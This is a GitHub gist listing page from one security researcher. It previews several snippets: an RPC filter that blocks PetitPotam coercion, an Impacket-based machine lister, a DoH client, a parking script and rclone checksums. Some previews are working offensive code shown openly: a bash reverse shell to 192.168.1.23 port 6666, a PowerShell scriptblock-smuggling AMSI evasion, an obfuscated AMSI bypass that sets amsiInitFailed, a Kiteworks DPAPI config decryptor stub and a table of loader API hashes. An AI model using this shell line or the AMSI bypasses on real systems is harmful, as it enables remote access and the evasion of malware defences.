k4nfr3
/ gist:9808709a83b9a56376ba92c332205ef0
Created
January 23, 2025 14:13
RPC Filter against Coercer (petitPotam)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| netsh | |
| rpc filter | |
| add rule layer=um actiontype=block | |
| add condition field=if_uuid matchtype=equal data=12345678–1234-ABCD-EF00–0123456789AB | |
| add filter | |
| add rule layer=um actiontype=block | |
| add condition field=if_uuid matchtype=equal data=c681d488-d850–11d0–8c52–00c04fd90f7e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bash -i >& /dev/tcp/192.168.1.23/6666 0>&1 |
k4nfr3
/ gist:b6a54bdd647273a3261c8c2bc34a9c24
Created
June 18, 2024 11:36
Powershell Scriptblock smuggling (AMSI ) from https://bc-security.org/scriptblock-smuggling/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast | |
| $ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast | |
| $Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null) | |
| $Sb = $Ast.GetScriptBlock() | |
| $Sb& |
k4nfr3
/ Kiteworks_DPAPI_session.cfg_decryptor
Created
March 1, 2024 17:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add NugetComponent Microsoft.Win32.Registry | |
| Add NugetComponent System.Security.Cryptography.ProtectedData | |
| Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/ | |
| Tested on lates version Kiteworks 8.3.0 | |
| ========================================= | |
| /* Created by Sergei Gundorov 1/2/2020 | |
| * Intent: provide sample project for encrypting secrets with DPAPI while working with | |
| * Power BI Embedded and API tutorials and samples. |
k4nfr3
/ velocity.py
Last active
June 30, 2023 15:02
velocity.ch daily script to repurchase my free parking as I'm using it daily
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| # Proxy settings fo debug (with burp or other) | |
| proxy_enable = False | |
| proxy = { | |
| 'http': 'http://127.0.0.1:8080', | |
| 'https': 'http://127.0.0.1:8080' | |
| } |
k4nfr3
/ list_machines.py
Created
May 17, 2023 07:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # modifications of original script GetAdusers.py from Impacket. | |
| # this version returns the list of last seen 24h machines | |
| #python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11 | |
| #Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation | |
| # | |
| #Password: | |
| #[*] Querying 192.168.16.11 for information about domain. | |
| #Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address | |
| #-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------ |
k4nfr3
/ DOH client test
Created
January 10, 2023 12:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import json | |
| import re | |
| import socket | |
| import ssl | |
| import subprocess | |
| import sys |
k4nfr3
/ IORI_Loader 0x99 hash of functions
Last active
October 28, 2022 15:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'ntdll.dll' '4097367' '0x3e8557' | |
| 'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662' | |
| 'RegNtPostCreateKey' '76320549262' '0x11c50f298e' | |
| 'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745' | |
| 'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb' | |
| 'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16' | |
| 'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8' | |
| 'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd' | |
| 'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8' | |
| 'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS | |
| =========================================================================== | |
| Windows Clients | |
| ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip | |
| 0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip | |
| ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip | |
| 0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip | |
| 18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip | |
| 6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host '[+] Loading AMSI Bypass...' | |
| S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} ) | |
| Write-Host '[+] done' -ForegroundColor green |
NewerOlder